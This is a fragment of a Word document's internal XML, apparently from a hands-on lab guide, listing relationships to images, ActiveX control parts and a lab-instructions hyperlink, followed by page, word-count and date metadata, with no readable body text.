Target="media/image5.jpeg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX8.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpeg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX12.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX19.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX30.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX33.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX37.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX48.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.jpeg"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpeg"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX57.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX23.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpeg"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpeg"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX41.xml"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX47.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX58.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control" Target="activeX/activeX6.xml"/><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image" Target="media/image16.jpeg"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX27.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX32.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.jpeg"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX52.xml"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX56.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX7.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX18.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX29.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpeg"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX36.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX40.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpeg"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpeg"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labclient.labondemand.com/Instructions/52f4d542-434e-4a10-8f51-0c2b8ca1d32b?rc=10" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX11.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX15.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX22.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX26.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX51.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX55.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX35.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpeg"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX39.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpeg"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpeg"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.jpeg"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.jpeg"/><Relationship Id="rId12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ontrol" Target="activeX/activeX2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX4.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labclient.labondemand.com/Instructions/52f4d542-434e-4a10-8f51-0c2b8ca1d32b?rc=10" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX17.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.jpeg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX14.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX25.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpeg"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX50.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://labclient.labondemand.com/Instructions/52f4d542-434e-4a10-8f51-0c2b8ca1d32b?rc=10" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX34.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX45.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX9.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX20.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX31.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX42.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX53.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.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46</Pages>
  <Words>2107</Words>
  <Characters>12016</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>100</Lines>
  <Paragraphs>28</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14095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2023-07-11T16:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-11T16:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>